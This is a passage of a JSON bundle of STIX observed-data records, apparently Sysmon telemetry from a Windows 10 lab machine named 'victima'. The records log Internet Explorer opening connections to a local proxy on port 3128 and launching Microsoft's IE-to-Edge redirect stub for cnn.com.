| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:WZDMLqomdLssStws7gcBNk/v6tE=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.908Z", | |
| "last_observed": "2022-07-27T14:26:14.908Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--e72c0869-87c4-485d-97e6-70cc6e77743f", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.920Z", | |
| "modified": "2022-07-28T16:05:22.920Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:23.354562775Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:17.024Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50161, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:O1ae4fRRXn4/VmUFd38ntsf/b40=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.921Z", | |
| "last_observed": "2022-07-27T14:26:14.921Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--f41895e2-e534-4825-9ff1-71aa14f7d6b1", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.920Z", | |
| "modified": "2022-07-28T16:05:22.920Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:23.355348258Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:17.024Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50162, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:SSyuEUm5ZK2Y+CQbXMBLUFaXzb8=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.923Z", | |
| "last_observed": "2022-07-27T14:26:14.923Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--4824ffcd-6a4e-46c7-9548-0c8c3677a373", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.921Z", | |
| "modified": "2022-07-28T16:05:22.921Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:23.356142679Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:17.024Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50163, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:BibQNF+IcstpnWsh/tdDmDwpVco=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.951Z", | |
| "last_observed": "2022-07-27T14:26:14.951Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--8d4597da-aad4-4ce9-8900-abf228f35721", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.921Z", | |
| "modified": "2022-07-28T16:05:22.921Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:23.356944058Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:17.024Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50164, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:KwpY4uOOVnPi3rd+gMsifonKKTg=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.980Z", | |
| "last_observed": "2022-07-27T14:26:14.980Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--2971e534-f57e-495d-8de3-f35387d1b46b", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.922Z", | |
| "modified": "2022-07-28T16:05:22.922Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:23.357730367Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:17.024Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50165, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:WCDU9KaEpPySQDoqGBKH4kVs1hg=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:15.008Z", | |
| "last_observed": "2022-07-27T14:26:15.008Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--b6da09ea-a058-45be-bb64-b5cf55d4bd89", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.922Z", | |
| "modified": "2022-07-28T16:05:22.922Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:24.377831255Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:18.049Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50166, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:9EkxnxejwNtlA/VHy91QUm9THbU=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:15.360Z", | |
| "last_observed": "2022-07-27T14:26:15.360Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--c106911d-4f01-4187-9766-3425ad66b5b5", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.922Z", | |
| "modified": "2022-07-28T16:05:22.922Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:24.379153874Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:18.049Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50167, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:GPP3OByew5GV9B5+IO2IgS5DObA=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:15.361Z", | |
| "last_observed": "2022-07-27T14:26:15.361Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--3803ddf5-aaf2-480a-a7f3-852e74c7ff11", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.923Z", | |
| "modified": "2022-07-28T16:05:22.923Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args_count": 4, | |
| "parent_entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b10-62e1-e801-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE\" SCODEF:6492 CREDAT:9474 /prefetch:2" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 6368, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=1 --customer-type=1 -- \"http://cnn.com/\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:34.664547104Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:28.226Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args_count": 4, | |
| "parent_entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b10-62e1-e801-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.065Z", | |
| "last_observed": "2022-07-27T14:26:24.065Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--9c3052aa-b328-48dd-a749-7d7eb1bdeab4", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.923Z", | |
| "modified": "2022-07-28T16:05:22.923Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b10-62e1-e901-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 6492, | |
| "binary_ref": "4", | |
